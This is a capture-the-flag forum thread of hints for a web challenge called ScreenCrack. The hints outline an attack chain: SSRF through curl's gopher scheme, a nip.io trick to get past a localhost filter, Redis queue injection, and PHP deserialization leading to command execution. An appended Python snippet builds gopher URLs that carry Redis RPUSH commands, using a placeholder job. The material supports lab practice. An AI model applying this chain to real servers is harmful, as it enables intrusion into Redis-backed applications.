Official ScreenCrack Discussion

Official discussion thread for ScreenCrack. Please do not post any spoilers or big hints.

2 Likes

wtf is that challenge

1 Like

That was really fun and interesting! Loved it

Any hints on how to solve it?

1 Like

As with all web challenges, follow the user input all the way through the code. Understand the functions that interact with that input. Are any vulnerable? Think about what things you could do with the input you control, what kind of bypasses are available to you, can you make the app do anything the developer hadn’t considered?

more specific hints: what other services are running? Maybe you can interact with it. Remember, HTTP isn’t the only protocol that exists.
Also, make sure to look at every file; maybe there is one that contains a record of someone's failed attempt at doing what it is you want to do.

2 Likes

Any hints please? I'll tell you what I found out so far: I noticed the redis server running and I found out you can issue commands to redis even through curl using gopher:// as a scheme. However, what I'm stuck on is the filter_var on 127.0.0.1; I tried every possible bypass I could find, but if something bypasses the filter, it crashes on curl and vice versa. Can anyone give me a nudge?

Did you check all bypasses as well as public domains which might resolve to 127.0.0.1?

I've bypassed the filter but I can't find a working gopher payload. Is it the right path?

Yep, it is the right path. Try to analyze the data (as well as the data structure) - use the docker instance to look into it.

Thanks for the help, I managed to get execution on the redis instance, but I can't achieve RCE since I get the error "can't set protected config". Is there anything else to try on redis since there are no keyspaces?

There are keyspaces. It is just a matter of time because they will be regularly cleared.

I couldn’t find anything beside Laravel queues and apparently those are known to be vulnerable, but I don’t know how to queue jobs to exploit the deserialization RCE. Any further tip?

nip.io

Any hints for me, please. I found that we can use the gopher protocol and bypass 127.0.0.1 to exploit an SSRF attack on redis, and I guess that we can get RCE by manipulating the file name to exploit a command injection attack, but I can't find out the right way to construct a payload to push a job to the redis queue and execute it.
Could someone give me a hint? I don't want to give up here :frowning:

ssrf to redis.
laravel_database_queues.
php unserialize to command execution.
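The posts above describe the chain only in outline (SSRF through curl with a gopher:// URL, a public hostname such as nip.io that resolves to 127.0.0.1 to get past the filter, then RPUSH into the Laravel queue list in Redis). The following is an added example, not code from the thread or from the challenge, showing how the Redis wire format (RESP) is packed into a gopher:// URL so that curl delivers it byte-for-byte to the Redis port. The hostname `127.0.0.1.nip.io`, the list name `laravel_database_queues:default` and the job body are assumptions/placeholders; the job body is a constructed stand-in, not a working Laravel deserialization payload.

```python
from urllib.parse import quote, unquote_to_bytes


def resp_encode(*args: str) -> bytes:
    """Encode one Redis command as a RESP array, the format redis-server parses.

    Example: resp_encode("PING") -> b"*1\r\n$4\r\nPING\r\n"
    """
    parts = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        parts.append(f"${len(raw)}\r\n".encode() + raw + b"\r\n")
    return b"".join(parts)


def gopher_url(host: str, port: int, commands) -> str:
    """Build a gopher:// URL that makes curl send the given Redis commands.

    curl strips the first character after the path slash as the gopher item
    type (here '_') and sends the remaining, percent-decoded bytes to the
    socket unchanged, so CRLF must be encoded as %0D%0A.
    """
    payload = b"".join(resp_encode(*cmd) for cmd in commands)
    return f"gopher://{host}:{port}/_" + quote(payload, safe="")


def bytes_on_the_wire(url: str) -> bytes:
    """What redis-server would receive for a gopher URL built above (for checking)."""
    _, _, path = url.partition(f"/_")
    return unquote_to_bytes(path)


# Constructed placeholder; a real job would carry a serialized PHP object in "data".
CONSTRUCTED_JOB = '{"job":"placeholder","data":{"command":"<serialized php object>"}}'


def queue_push_url(
    host: str = "127.0.0.1.nip.io",          # assumed: nip.io maps <ip>.nip.io to <ip>
    port: int = 6379,
    queue: str = "laravel_database_queues:default",  # assumed list name
    job: str = CONSTRUCTED_JOB,
) -> str:
    """URL that pushes one job onto the queue list and then closes the connection."""
    return gopher_url(host, port, [["RPUSH", queue, job], ["QUIT"]])


if __name__ == "__main__":
    url = queue_push_url()
    print(url)
    print(bytes_on_the_wire(url).decode())
```

The `bytes_on_the_wire` helper exists so you can confirm, before sending anything, that the decoded bytes are exactly the RESP frames you intended; if the URL passes through a second URL parser in the target application, the percent-encoding may need to be applied twice.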